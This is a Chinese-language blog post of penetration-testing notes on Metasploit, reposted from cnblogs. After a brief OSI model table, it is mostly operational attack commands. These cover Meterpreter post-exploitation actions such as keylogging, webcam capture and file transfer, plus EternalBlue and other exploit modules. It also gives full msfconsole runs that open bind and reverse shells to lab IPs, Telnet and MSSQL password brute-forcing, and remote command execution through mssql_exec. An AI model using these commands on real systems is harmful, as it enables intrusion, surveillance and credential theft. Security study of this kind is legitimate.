渗透测试笔记

09.23 - 09.26|Xianyu233

2019/9/26

一个普通人的爱好


 

 

# OSI七层网络模型

OSI七层网络模型

tcp/ip四层概念模型

对应的网络协议

应用层

应用层

HTTP FTP DNS

表示层

会话层

传输层

传输层

TCP UDP SCTP RTP

网络层

网络层

IP ARP RARP ICMP IGMP

数据链路层

网络接口层

 

物理层

 

# Msfconsole使用笔记

  • Metasploit是一款开源的安全漏洞检测与利用框架，msfconsole 是其命令行控制台

 

Meterpreter 常用命令（在已获得的 meterpreter 会话中执行）

background                      //处于后台
sessions -i index               //与会话进行交互（在 msf 提示符下执行，index 为 sessions -l 列出的编号）
quit                            //退出会话
shell                           //获得控制台权限
upload /root/Desktop/netcat.exe c:\\    //上传文件到目标
download nimeia.txt /root/Desktop       //下载文件到本机
execute -H -i -f cmd.exe                //创建新进程cmd.exe
sysinfo                         //查看目标系统信息
shutdown                        //关机
keyscan_start                   //开启键盘记录
keyscan_dump                    //提取键盘记录
keyscan_stop                    //关闭键盘记录
webcam_snap                     //从指定的摄像头拍摄照片

 

# 可以利用的模块（注意：以下内存破坏类 exploit 可能导致目标服务崩溃或重启，仅在获得授权的范围内使用）

445端口:

  • exploit/windows/smb/ms17_010_eternalblue
  • exploit/windows/smb/ms08_067_netapi

135端口:

  • exploit/windows/dcerpc/ms03_026_dcom

缓冲溢出:

  • exploit/windows/iis/ms01_033_idq

生成木马:

 

# 攻击Linux

set RHOSTS IP
set username root
set PASS_FILE /xxx.txt        //密码字典文件路径（每行一个密码）
run    /     exploit          //开始运行/攻击 
sessions -i 1                //打开会话
gcc -o 转换的文件
show options                   //查看模块当前定义的参数
packet captre                //抓包
#MaxAuthTries 6                //sshd_config 中每个连接允许的最大认证尝试次数（默认注释，默认值为 6），爆破时会受此限制
exploit                        //启动exploit模块
run                            //启动非入侵的模块
use ____                       //使用模块
search _____                   //搜索模块
set _____ _____                //设置模块指定的选项
exit                           //退出

# 正向连接（bind_tcp：payload 在目标上监听端口，攻击机主动连接；要求目标端口可被入站访问）

root@kali:/# msfconsole 
msf5 > use exploit/windows/iis/ms01_033_idq
msf5 exploit(windows/iis/ms01_033_idq) > set payload windows/shell/bind_tcp
msf5 exploit(windows/iis/ms01_033_idq) > show options
msf5 exploit(windows/iis/ms01_033_idq) > set RHOSTS 192.168.1.133
RHOSTS => 192.168.1.133
msf5 exploit(windows/iis/ms01_033_idq) > set target 1 
target => 1
msf5 exploit(windows/iis/ms01_033_idq) > exploit

# 反向连接（reverse_tcp：目标主动回连到攻击机的 LHOST:LPORT，攻击机需先监听）

root@kali:/# msfconsole
msf5 > use exploit/windows/iis/ms01_033_idq
msf5 exploit(windows/iis/ms01_033_idq) > set payload windows/shell/reverse_tcp
msf5 exploit(windows/iis/ms01_033_idq) > set target 1 
target => 1
msf5 exploit(windows/iis/ms01_033_idq) > set RHOSTS 192.168.1.133
RHOSTS => 192.168.1.133
msf5 exploit(windows/iis/ms01_033_idq) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf5 exploit(windows/iis/ms01_033_idq) > set LPORT 端口        //反向连接的监听端口（上一行已设置 LHOST，这里应为 LPORT）
msf5 exploit(windows/iis/ms01_033_idq) > exploit

# ARP扫描

root@kali:/# msfconsole
msf5 > use auxiliary/scanner/discovery/arp_sweep
msf5 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.1.0/24
msf5 auxiliary(scanner/discovery/arp_sweep) > run

 

# Telnet攻击

root@kali:/# msfconsole
msf5 > use auxiliary/scanner/telnet/telnet_login
msf5 auxiliary(scanner/telnet/telnet_login) > set RHOSTS 192.168.1.11
msf5 auxiliary(scanner/telnet/telnet_login) > set PASS_FILE 字典路径
msf5 auxiliary(scanner/telnet/telnet_login) > set USERNAME administrator
msf5 auxiliary(scanner/telnet/telnet_login) > run

# Mssql_exec

root@kali:/# msfconsole
msf5 > use auxiliary/admin/mssql/mssql_exec
msf5 auxiliary(admin/mssql/mssql_exec) > set RHOST 192.168.1.11
RHOST => 192.168.1.11
msf5 auxiliary(admin/mssql/mssql_exec) > set PASSWORD 数据库密码
msf5 auxiliary(admin/mssql/mssql_exec) > set CMD cmd.exe\ /c\ echo\ OWNED\ >\ C:\owned.exe
msf5 auxiliary(admin/mssql/mssql_exec) > run

 

# Mssql_login 

root@kali:/# msfconsole
msf5 > use auxiliary/scanner/mssql/mssql_login
msf5 auxiliary(scanner/mssql/mssql_login) > set RHOST 192.168.1.11
msf5 auxiliary(scanner/mssql/mssql_login) > set PASS_FILE 字典路径
msf5 auxiliary(scanner/mssql/mssql_login) > run


转载自www.cnblogs.com/D-arling/p/11644126.html